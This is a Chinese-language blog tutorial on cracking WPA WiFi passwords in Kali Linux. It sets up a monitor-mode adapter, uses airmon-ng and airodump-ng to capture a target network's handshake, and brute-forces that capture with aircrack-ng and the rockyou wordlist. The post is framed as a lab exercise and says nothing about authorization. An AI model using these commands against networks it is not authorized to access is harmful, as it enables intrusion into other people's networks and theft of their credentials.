Kali Linux使用 airmon-ng 等相关命令爆破 Wifi 密码

首先我是在淘宝上买的免驱动的无线网卡,插上一般可以直接使用,不过买回来发现无法连接一些wifi,是wifi除了满格信号,就是没有信号黑色的。

我还以为这个wifi信号怎么这么差,联系客服发现是最新的kali需要安装一个软件包realtek-rtl8188eus-dkms

淘宝客服的教程:kali单频无线网卡驱动更新方法

使用apt安装该软件包

sudo apt install linux-headers-686-pae   (32位系统执行这个命令安装内核头文件,64位的系统不用执行,下面的命令会自动安装头文件)
sudo apt install realtek-rtl8188eus-dkms    -y  (32位与64位系统都要执行这条)

设置网卡为Monitor模式

安装后开始破解Wifi密码
首先需要将无线网卡设置为Monitor监听模式,因为airmon-ng这个命令需要我们设置为这个模式

sudo ifconfig wlan0 down  # 关闭wlan0网卡,这里可能不同的系统识别的名称不一样
sudo iwconfig wlan0 mode Monitor # 设置wlan0网卡为Monitor模式
sudo ifconfig wlan0 up    # 开启wlan0网卡

如果上述设置Monitor模式报错,可能是你的无线网卡不支持该模式,需要买一个支持的

关闭影响使用airmon-ng的进程

sudo airmon-ng check kill    # 该步骤会将系统的网络管理器杀死

开启wlan0网卡的监听模式

sudo airmon-ng start wlan0

注意我这里的网卡名称为wlan1

开启该网卡的unspec显示的内容会和我的类似

使用ariodump-ng检索wifi信息

sudo airodump-ng wlan1

这里有几个重要的结果,一会我们会使用到:

  • BSSID: 代表这个无线网络的MAC地址
  • CH: 代表这个无线网络使用的信道
  • ESSID: 无线网络Wifi的名称

使用ariodum-ng对指定的wifi进行抓包

sudo airodump-ng --bssid 9C:A6:15:FF:BB:C7 -c 6 wlan1 -w /home/junglezt/桌面/NetworkSecurity/

其中参数:

  • --bssid: 就是我们获取到指定网络的MAC地址
  • -c: 指定该网络的信道
  • -w: 指定抓取该网络数据包存放的位置

在抓取过程中,使用任意一台设备连接到该wifi,然后Ctrl + C停止抓包即可

抓取成功,会在/home/junglezt/桌面/NetworkSecurity/目录下生成一些文件,其中重要的是一个后缀名为cap的文件

使用aircrack-ng爆破抓取cap数据包中wifi的密码

爆破就是使用一个含有很多密码的字典,不断的尝试来直到试出密码为止,这里使用的字典是kali自带的/usr/share/wordlists/rockyou.txt

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/junglezt/桌面/NetworkSecurity/-01.cap

-w指定字典,对/home/junglezt/桌面/NetworkSecurity/-01.cap文件进行爆破

成功破解密码就会停止,这里我测试wifi的密码为Admin123,该密码在rockyou.txt中含有

注意:能不能破解出密码,取决于你的字典中有没有含有目标wifi的密码,取决与你字典和机器的性能。

实验结束。

posted @ 2023-05-17 11:39  Junglezt  阅读(1541)  评论(0编辑  收藏  举报